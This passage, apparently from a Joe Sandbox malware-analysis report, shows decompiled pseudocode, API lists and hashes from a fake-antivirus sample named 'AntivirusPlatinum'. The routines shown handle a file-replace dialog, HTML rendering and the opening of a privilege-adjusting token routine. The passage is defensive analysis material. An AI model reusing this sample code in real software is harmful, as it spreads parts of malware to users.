                                                                                                                                                      • Opcode ID: 8026bc820de6d862ce91a14b57fdf5da722ddd537d77b2a53211bf6da7feec6e
                                                                                                                                                      • Instruction ID: 14793ef18abff2b128ca596471c817456f9129885f12b962b2fa9b3f18b83a8b
                                                                                                                                                      • Opcode Fuzzy Hash: 8026bc820de6d862ce91a14b57fdf5da722ddd537d77b2a53211bf6da7feec6e
                                                                                                                                                      • Instruction Fuzzy Hash: 73B011300A000AAA8E002F30CE088203A20EA2330A300C2B0A002C82A0CB22C023AB00
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406EF6(signed char _a4, char _a8) {
                                                                                                                                                      				CHAR* _t3;
                                                                                                                                                      				CHAR* _t4;
                                                                                                                                                      
                                                                                                                                                      				_t3 = _a4 & 0x000000ff;
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					_t4 = CharUpperA(_t3); // executed
                                                                                                                                                      					return _t4;
                                                                                                                                                      				}
                                                                                                                                                      				return _t3;
                                                                                                                                                      			}





                                                                                                                                                      0x00406efb
                                                                                                                                                      0x00406f00
                                                                                                                                                      0x00406f03
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406f03
                                                                                                                                                      0x00406f09

                                                                                                                                                      APIs
                                                                                                                                                      • CharUpperA.USER32(?,00406F65,00000000,?,00000000,00000000,?,?,004071B6,00000000,00000000,00000000,__rar_,00000000,00000006,?), ref: 00406F03
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharUpper
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 9403516-0
                                                                                                                                                      • Opcode ID: 6bbc7cc59114ae65e0fe357eeee9f6236295800aaef3f650eca08f95825268fc
                                                                                                                                                      • Instruction ID: 10a890fd1d11d5ae954edd159976ce38f528880547e9b8c490f3023850044f8b
                                                                                                                                                      • Opcode Fuzzy Hash: 6bbc7cc59114ae65e0fe357eeee9f6236295800aaef3f650eca08f95825268fc
                                                                                                                                                      • Instruction Fuzzy Hash: 41B092A080C29129EB02A320961C72BBE942BA1301F16C89AF0D591092D1BCC524DB6D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E0040AE97(void* __ecx, void* __edx) {
                                                                                                                                                      				void* _t67;
                                                                                                                                                      				void* _t80;
                                                                                                                                                      				int _t82;
                                                                                                                                                      				signed int _t124;
                                                                                                                                                      				void* _t142;
                                                                                                                                                      				struct HICON__* _t143;
                                                                                                                                                      				void* _t146;
                                                                                                                                                      				void* _t147;
                                                                                                                                                      				void* _t148;
                                                                                                                                                      				void* _t149;
                                                                                                                                                      				void* _t150;
                                                                                                                                                      				void* _t156;
                                                                                                                                                      				signed int _t157;
                                                                                                                                                      				struct HWND__* _t163;
                                                                                                                                                      				void* _t171;
                                                                                                                                                      				void* _t173;
                                                                                                                                                      				void* _t174;
                                                                                                                                                      				void* _t176;
                                                                                                                                                      
                                                                                                                                                      				_t158 = __edx;
                                                                                                                                                      				_t156 = __ecx;
                                                                                                                                                      				_t171 = _t173 - 0x68;
                                                                                                                                                      				_t174 = _t173 - 0x95c;
                                                                                                                                                      				_t163 =  *(_t171 + 0x70);
                                                                                                                                                      				E0040309D(__edx, _t163,  *(_t171 + 0x74),  *(_t171 + 0x78),  *((intOrPtr*)(_t171 + 0x7c)), "REPLACEFILEDLG", 0, 0);
                                                                                                                                                      				_t67 =  *(_t171 + 0x74) - 0x110;
                                                                                                                                                      				if(_t67 == 0) {
                                                                                                                                                      					E0040A4AB(_t171 - 0x8f4,  *((intOrPtr*)(_t171 + 0x7c)), 0x3ff);
                                                                                                                                                      					_push(0x400);
                                                                                                                                                      					 *((char*)(_t171 - 0x4f5)) = 0;
                                                                                                                                                      					E00407A16(_t156, _t171 - 0x8f4, 0);
                                                                                                                                                      					SetDlgItemTextA(_t163, 0x65, _t171 - 0x8f4);
                                                                                                                                                      					SHGetFileInfoA(_t171 - 0x8f4, 0, _t171 - 0x4f4, 0x160, 0x100);
                                                                                                                                                      					SendDlgItemMessageA( *(_t171 + 0x70), 0x66, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                      					_t80 = FindFirstFileA(_t171 - 0x8f4, _t171 - 0x194);
                                                                                                                                                      					 *(_t171 + 0x74) = _t80;
                                                                                                                                                      					if(_t80 != 0xffffffff) {
                                                                                                                                                      						FileTimeToLocalFileTime(_t171 - 0x180, _t171 + 0x48);
                                                                                                                                                      						FileTimeToSystemTime(_t171 + 0x48, _t171 + 0x58);
                                                                                                                                                      						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                      						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                      						wsprintfA(_t171 - 0x394, "%s %s %s", E004098F7(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                      						_t176 = _t174 + 0x14;
                                                                                                                                                      						SetDlgItemTextA( *(_t171 + 0x70), 0x6a, _t171 - 0x394);
                                                                                                                                                      						FindClose( *(_t171 + 0x74));
                                                                                                                                                      						if(( *(_t171 - 0x194) & 0x00000010) == 0) {
                                                                                                                                                      							E0040A88B(_t156, _t158,  *((intOrPtr*)(_t171 - 0x174)), 0, _t171 - 0x54, 0x32);
                                                                                                                                                      							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098F7(0x80));
                                                                                                                                                      							_t176 = _t176 + 0x10;
                                                                                                                                                      							SetDlgItemTextA( *(_t171 + 0x70), 0x68, _t171 - 0x394);
                                                                                                                                                      						}
                                                                                                                                                      						SendDlgItemMessageA( *(_t171 + 0x70), 0x67, 0x170,  *(_t171 - 0x4f4), 0);
                                                                                                                                                      						DosDateTimeToFileTime( *0x419eda & 0x0000ffff,  *0x419ed8 & 0x0000ffff, _t171 + 0x50);
                                                                                                                                                      						FileTimeToSystemTime(_t171 + 0x50, _t171 + 0x58);
                                                                                                                                                      						GetTimeFormatA(0x400, 2, _t171 + 0x58, 0, _t171 - 0x20, 0x32);
                                                                                                                                                      						GetDateFormatA(0x400, 0, _t171 + 0x58, 0, _t171 + 0x14, 0x32);
                                                                                                                                                      						wsprintfA(_t171 - 0x394, "%s %s %s", E004098F7(0x81), _t171 + 0x14, _t171 - 0x20);
                                                                                                                                                      						SetDlgItemTextA( *(_t171 + 0x70), 0x6b, _t171 - 0x394);
                                                                                                                                                      						_t124 =  *0x419ee4; // 0x0
                                                                                                                                                      						_t157 =  *0x419ee0; // 0x0
                                                                                                                                                      						if(( *(_t171 - 0x194) & 0x00000010) == 0 || (_t157 | _t124) != 0) {
                                                                                                                                                      							E0040A88B(_t157, _t171 - 0x54, _t157, _t124, _t171 - 0x54, 0x32);
                                                                                                                                                      							wsprintfA(_t171 - 0x394, "%s %s", _t171 - 0x54, E004098F7(0x80));
                                                                                                                                                      							SetDlgItemTextA( *(_t171 + 0x70), 0x69, _t171 - 0x394);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					L25:
                                                                                                                                                      					_t82 = 1;
                                                                                                                                                      					L26:
                                                                                                                                                      					return _t82;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t67 != 1) {
                                                                                                                                                      					L9:
                                                                                                                                                      					_t82 = 0;
                                                                                                                                                      					goto L26;
                                                                                                                                                      				}
                                                                                                                                                      				_push(2);
                                                                                                                                                      				_pop(1);
                                                                                                                                                      				_t142 = ( *(_t171 + 0x78) & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t142 == 0) {
                                                                                                                                                      					L14:
                                                                                                                                                      					_push(5);
                                                                                                                                                      					L15:
                                                                                                                                                      					_pop(1);
                                                                                                                                                      					L16:
                                                                                                                                                      					_t143 = SendDlgItemMessageA(_t163, 0x66, 0x171, 0, 0);
                                                                                                                                                      					if(_t143 != 0) {
                                                                                                                                                      						DestroyIcon(_t143);
                                                                                                                                                      					}
                                                                                                                                                      					EndDialog(_t163, 1);
                                                                                                                                                      					goto L25;
                                                                                                                                                      				}
                                                                                                                                                      				_t146 = _t142 - 0x6a;
                                                                                                                                                      				if(_t146 == 0) {
                                                                                                                                                      					goto L16;
                                                                                                                                                      				}
                                                                                                                                                      				_t147 = _t146 - 1;
                                                                                                                                                      				if(_t147 == 0) {
                                                                                                                                                      					goto L16;
                                                                                                                                                      				}
                                                                                                                                                      				_t148 = _t147 - 1;
                                                                                                                                                      				if(_t148 == 0) {
                                                                                                                                                      					_push(4);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				_t149 = _t148 - 1;
                                                                                                                                                      				if(_t149 == 0) {
                                                                                                                                                      					_push(3);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				_t150 = _t149 - 1;
                                                                                                                                                      				if(_t150 == 0) {
                                                                                                                                                      					_push(6);
                                                                                                                                                      					goto L15;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t150 == 1) {
                                                                                                                                                      					goto L14;
                                                                                                                                                      				}
                                                                                                                                                      				goto L9;
                                                                                                                                                      			}





















                                                                                                                                                      0x0040ae97
                                                                                                                                                      0x0040ae97
                                                                                                                                                      0x0040ae98
                                                                                                                                                      0x0040ae9c
                                                                                                                                                      0x0040aea5
                                                                                                                                                      0x0040aebb
                                                                                                                                                      0x0040aec3
                                                                                                                                                      0x0040aec8
                                                                                                                                                      0x0040af3e
                                                                                                                                                      0x0040af48
                                                                                                                                                      0x0040af51
                                                                                                                                                      0x0040af57
                                                                                                                                                      0x0040af6c
                                                                                                                                                      0x0040af87
                                                                                                                                                      0x0040af9e
                                                                                                                                                      0x0040afb2
                                                                                                                                                      0x0040afb8
                                                                                                                                                      0x0040afbe
                                                                                                                                                      0x0040afcf
                                                                                                                                                      0x0040afdd
                                                                                                                                                      0x0040aff1
                                                                                                                                                      0x0040b004
                                                                                                                                                      0x0040b02f
                                                                                                                                                      0x0040b031
                                                                                                                                                      0x0040b040
                                                                                                                                                      0x0040b045
                                                                                                                                                      0x0040b052
                                                                                                                                                      0x0040b062
                                                                                                                                                      0x0040b082
                                                                                                                                                      0x0040b084
                                                                                                                                                      0x0040b093
                                                                                                                                                      0x0040b093
                                                                                                                                                      0x0040b0a7
                                                                                                                                                      0x0040b0c1
                                                                                                                                                      0x0040b0cf
                                                                                                                                                      0x0040b0e4
                                                                                                                                                      0x0040b0f9
                                                                                                                                                      0x0040b11e
                                                                                                                                                      0x0040b12f
                                                                                                                                                      0x0040b138
                                                                                                                                                      0x0040b13d
                                                                                                                                                      0x0040b143
                                                                                                                                                      0x0040b153
                                                                                                                                                      0x0040b173
                                                                                                                                                      0x0040b184
                                                                                                                                                      0x0040b184
                                                                                                                                                      0x0040b143
                                                                                                                                                      0x0040b186
                                                                                                                                                      0x0040b188
                                                                                                                                                      0x0040b189
                                                                                                                                                      0x0040b190
                                                                                                                                                      0x0040b190
                                                                                                                                                      0x0040aecb
                                                                                                                                                      0x0040aeec
                                                                                                                                                      0x0040aeec
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aeec
                                                                                                                                                      0x0040aed1
                                                                                                                                                      0x0040aed3
                                                                                                                                                      0x0040aed4
                                                                                                                                                      0x0040aed6
                                                                                                                                                      0x0040af04
                                                                                                                                                      0x0040af04
                                                                                                                                                      0x0040af06
                                                                                                                                                      0x0040af06
                                                                                                                                                      0x0040af07
                                                                                                                                                      0x0040af11
                                                                                                                                                      0x0040af19
                                                                                                                                                      0x0040af1c
                                                                                                                                                      0x0040af1c
                                                                                                                                                      0x0040af24
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040af24
                                                                                                                                                      0x0040aed8
                                                                                                                                                      0x0040aedb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040af01
                                                                                                                                                      0x0040aedd
                                                                                                                                                      0x0040aede
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aee0
                                                                                                                                                      0x0040aee1
                                                                                                                                                      0x0040aefb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aefb
                                                                                                                                                      0x0040aee3
                                                                                                                                                      0x0040aee4
                                                                                                                                                      0x0040aef7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aef7
                                                                                                                                                      0x0040aee6
                                                                                                                                                      0x0040aee7
                                                                                                                                                      0x0040aef3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aef3
                                                                                                                                                      0x0040aeea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,00000171,00000000,00000000), ref: 0040AF11
                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0040AF1C
                                                                                                                                                      • EndDialog.USER32(?,00000005), ref: 0040AF24
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040AF6C
                                                                                                                                                      • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 0040AF87
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,00000170,?,00000000), ref: 0040AF9E
                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040AFB2
                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040AFCF
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AFDD
                                                                                                                                                      • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040AFF1
                                                                                                                                                      • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B004
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B02F
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B040
                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040B045
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B082
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B093
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000067,00000170,?,00000000), ref: 0040B0A7
                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0040B0C1
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040B0CF
                                                                                                                                                      • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040B0E4
                                                                                                                                                      • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B0F9
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B11E
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B12F
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B173
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B184
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$Item$File$Text$Formatwsprintf$DateMessageSend$FindSystem$CloseDestroyDialogFirstIconInfoLocal
                                                                                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 1296638866-1840816070
                                                                                                                                                      • Opcode ID: 81188f02349ff2494ade99b0fda97fe7a7c576c23cec11c941e2f9909fbb7495
                                                                                                                                                      • Instruction ID: b8757001107efa6af174484403e24566bff63b119f9254fdcbc402ae20e3f96d
                                                                                                                                                      • Opcode Fuzzy Hash: 81188f02349ff2494ade99b0fda97fe7a7c576c23cec11c941e2f9909fbb7495
                                                                                                                                                      • Instruction Fuzzy Hash: 3F912E7254021DBBEB21DFA0CD85FEB37ACEB08740F044172BB05E50D1DAB99A658B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00406860(intOrPtr __ecx) {
                                                                                                                                                      				char* _t48;
                                                                                                                                                      				short* _t55;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				char _t58;
                                                                                                                                                      				short* _t59;
                                                                                                                                                      				char _t62;
                                                                                                                                                      				short* _t64;
                                                                                                                                                      				int _t65;
                                                                                                                                                      				intOrPtr _t83;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      				char* _t87;
                                                                                                                                                      				int _t94;
                                                                                                                                                      				intOrPtr _t95;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      
                                                                                                                                                      				_t96 = _t98 - 0x74;
                                                                                                                                                      				_t48 =  *(__ecx + 0xc);
                                                                                                                                                      				 *((intOrPtr*)(_t96 + 0x60)) = __ecx;
                                                                                                                                                      				if(_t48 == 0) {
                                                                                                                                                      					L27:
                                                                                                                                                      					return _t48;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t96 + 0x64) = 0;
                                                                                                                                                      				 *((intOrPtr*)( *_t48 + 0x2c))(_t48, L"about:blank", 0, 0, 0, 0, _t86);
                                                                                                                                                      				_t83 = __ecx;
                                                                                                                                                      				 *((char*)(_t96 + 0x6b)) = E004065B9( *(_t96 + 0x7c));
                                                                                                                                                      				_t94 = 0x100 + lstrlenA( *(_t96 + 0x7c)) * 6;
                                                                                                                                                      				_t48 = GlobalAlloc(0x40, _t94);
                                                                                                                                                      				_t87 = _t48;
                                                                                                                                                      				if(_t87 == 0) {
                                                                                                                                                      					L26:
                                                                                                                                                      					goto L27;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t96 - 0x38) = 0x94;
                                                                                                                                                      				GetVersionExA(_t96 - 0x38);
                                                                                                                                                      				if( *((intOrPtr*)(_t96 - 0x28)) != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					 *((char*)(_t96 + 0x73)) = 1;
                                                                                                                                                      					L5:
                                                                                                                                                      					E0040A477(_t87, "<html>");
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                      						E0040A5E2(_t87, "<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                                                                                                      						 *((intOrPtr*)(_t96 + 0x5c)) = E0040A384(_t83, _t87) + _t87;
                                                                                                                                                      						E0040A5E2(_t87, "utf-8\"></head>");
                                                                                                                                                      					}
                                                                                                                                                      					_t55 =  *(_t96 + 0x7c);
                                                                                                                                                      					 *(_t96 + 0x6c) = _t55;
                                                                                                                                                      					L9:
                                                                                                                                                      					if( *_t55 == 0x20) {
                                                                                                                                                      						 *(_t96 + 0x6c) =  &(( *(_t96 + 0x6c))[0]);
                                                                                                                                                      						_t55 =  *(_t96 + 0x6c);
                                                                                                                                                      						goto L9;
                                                                                                                                                      					}
                                                                                                                                                      					_t56 = E0040A5BD( *(_t96 + 0x6c), "<html>", 6);
                                                                                                                                                      					asm("sbb al, al");
                                                                                                                                                      					_t58 =  ~_t56 + 1;
                                                                                                                                                      					 *((char*)(_t96 + 0x6a)) = _t58;
                                                                                                                                                      					if(_t58 == 0) {
                                                                                                                                                      						_t59 =  *(_t96 + 0x7c);
                                                                                                                                                      					} else {
                                                                                                                                                      						_t59 =  &(( *(_t96 + 0x6c))[3]);
                                                                                                                                                      					}
                                                                                                                                                      					E0040A5E2(_t87, _t59);
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x6a)) == 0) {
                                                                                                                                                      						E0040A5E2(_t87, "</html>");
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x6b)) == 0) {
                                                                                                                                                      						E004065E9( *((intOrPtr*)(_t96 + 0x60)), _t87);
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                      						_t64 = E0040A1EC(_t94 + _t94);
                                                                                                                                                      						 *(_t96 + 0x6c) = _t64;
                                                                                                                                                      						if(_t64 != 0) {
                                                                                                                                                      							_t65 = MultiByteToWideChar(0, 0, _t87, 0xffffffff, _t64, _t94);
                                                                                                                                                      							_t32 =  &(_t87[3]); // 0x3
                                                                                                                                                      							 *((char*)(_t96 + 0x7f)) = _t65 != 0;
                                                                                                                                                      							if(WideCharToMultiByte(0xfde9, 0,  *(_t96 + 0x6c), 0xffffffff, _t32, _t94, 0, 0) == 0) {
                                                                                                                                                      								 *((char*)(_t96 + 0x7f)) = 0;
                                                                                                                                                      							}
                                                                                                                                                      							E0040A205( *(_t96 + 0x6c));
                                                                                                                                                      							if( *((intOrPtr*)(_t96 + 0x7f)) == 0) {
                                                                                                                                                      								 *((char*)( *((intOrPtr*)(_t96 + 0x5c)))) = 0x5f;
                                                                                                                                                      							} else {
                                                                                                                                                      								 *_t87 = 0xef;
                                                                                                                                                      								_t87[1] = 0xbb;
                                                                                                                                                      								_t87[2] = 0xbf;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t48 = _t96 + 0x64;
                                                                                                                                                      					__imp__CreateStreamOnHGlobal(_t87, 1, _t48);
                                                                                                                                                      					if(_t48 >= 0) {
                                                                                                                                                      						_t95 =  *((intOrPtr*)(_t96 + 0x60));
                                                                                                                                                      						 *((char*)(_t95 + 0x15)) = E004064FD( *((intOrPtr*)(_t95 + 0xc)),  *(_t96 + 0x64));
                                                                                                                                                      						_t62 =  *(_t96 + 0x64);
                                                                                                                                                      						_t48 =  *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                      					}
                                                                                                                                                      					goto L26;
                                                                                                                                                      				}
                                                                                                                                                      				 *((char*)(_t96 + 0x73)) = 0;
                                                                                                                                                      				if(( *(_t96 - 0x2c) & 0x0000ffff) < 0x7ce) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}


















                                                                                                                                                      0x00406861
                                                                                                                                                      0x0040686f
                                                                                                                                                      0x00406874
                                                                                                                                                      0x00406879
                                                                                                                                                      0x00406a10
                                                                                                                                                      0x00406a16
                                                                                                                                                      0x00406a16
                                                                                                                                                      0x00406889
                                                                                                                                                      0x0040688f
                                                                                                                                                      0x00406895
                                                                                                                                                      0x0040689f
                                                                                                                                                      0x004068ad
                                                                                                                                                      0x004068b6
                                                                                                                                                      0x004068bc
                                                                                                                                                      0x004068c0
                                                                                                                                                      0x00406a0f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406a0f
                                                                                                                                                      0x004068ca
                                                                                                                                                      0x004068d1
                                                                                                                                                      0x004068db
                                                                                                                                                      0x004068eb
                                                                                                                                                      0x004068eb
                                                                                                                                                      0x004068ef
                                                                                                                                                      0x004068f5
                                                                                                                                                      0x004068fd
                                                                                                                                                      0x00406905
                                                                                                                                                      0x00406918
                                                                                                                                                      0x0040691b
                                                                                                                                                      0x0040691b
                                                                                                                                                      0x00406920
                                                                                                                                                      0x00406923
                                                                                                                                                      0x0040692e
                                                                                                                                                      0x00406931
                                                                                                                                                      0x00406928
                                                                                                                                                      0x0040692b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040692b
                                                                                                                                                      0x0040693d
                                                                                                                                                      0x00406944
                                                                                                                                                      0x00406946
                                                                                                                                                      0x00406948
                                                                                                                                                      0x0040694b
                                                                                                                                                      0x00406955
                                                                                                                                                      0x0040694d
                                                                                                                                                      0x00406950
                                                                                                                                                      0x00406950
                                                                                                                                                      0x0040695a
                                                                                                                                                      0x00406962
                                                                                                                                                      0x0040696a
                                                                                                                                                      0x0040696a
                                                                                                                                                      0x00406972
                                                                                                                                                      0x00406978
                                                                                                                                                      0x00406978
                                                                                                                                                      0x00406980
                                                                                                                                                      0x00406986
                                                                                                                                                      0x0040698b
                                                                                                                                                      0x00406990
                                                                                                                                                      0x00406999
                                                                                                                                                      0x004069a4
                                                                                                                                                      0x004069ad
                                                                                                                                                      0x004069bf
                                                                                                                                                      0x004069c1
                                                                                                                                                      0x004069c1
                                                                                                                                                      0x004069c7
                                                                                                                                                      0x004069cf
                                                                                                                                                      0x004069e1
                                                                                                                                                      0x004069d1
                                                                                                                                                      0x004069d1
                                                                                                                                                      0x004069d4
                                                                                                                                                      0x004069d8
                                                                                                                                                      0x004069d8
                                                                                                                                                      0x004069cf
                                                                                                                                                      0x00406990
                                                                                                                                                      0x004069e4
                                                                                                                                                      0x004069eb
                                                                                                                                                      0x004069f3
                                                                                                                                                      0x004069f8
                                                                                                                                                      0x00406a03
                                                                                                                                                      0x00406a06
                                                                                                                                                      0x00406a0c
                                                                                                                                                      0x00406a0c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004069f3
                                                                                                                                                      0x004068e1
                                                                                                                                                      0x004068e9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenA.KERNEL32(?,?), ref: 004068A2
                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,-00000100), ref: 004068B6
                                                                                                                                                      • GetVersionExA.KERNEL32(?), ref: 004068D1
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,-00000100,00000000,00000000,?,?,<html>,00000006,00000000,<html>), ref: 00406999
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,000000FF,00000003,-00000100,00000000,00000000), ref: 004069B7
                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,00000000,?,?,<html>,00000006,00000000,<html>), ref: 004069EB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharGlobalMultiWide$AllocCreateStreamVersionlstrlen
                                                                                                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$about:blank$utf-8"></head>
                                                                                                                                                      • API String ID: 918982468-1117646011
                                                                                                                                                      • Opcode ID: f4b66ca56256074701a77dfd2d7c8255339cab005059f91be7c8ef823ca1bce2
                                                                                                                                                      • Instruction ID: 5c5e2e41cef04153fcc374feb770f7bcd7630f055a3a5a69099902d12bd6b0ed
                                                                                                                                                      • Opcode Fuzzy Hash: f4b66ca56256074701a77dfd2d7c8255339cab005059f91be7c8ef823ca1bce2
                                                                                                                                                      • Instruction Fuzzy Hash: 22519571500388AEDB21EF748C45DAE7FA9AF06714F15412BF966A32D2C678CC24DB29
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E004034AA() {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                      				int _t11;
                                                                                                                                                      				char _t31;
                                                                                                                                                      
                                                                                                                                                      				_t31 =  *0x41486e; // 0x0
                                                                                                                                                      				if(_t31 == 0) {
                                                                                                                                                      					 *0x41486e = 1;
                                                                                                                                                      					_t11 = OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
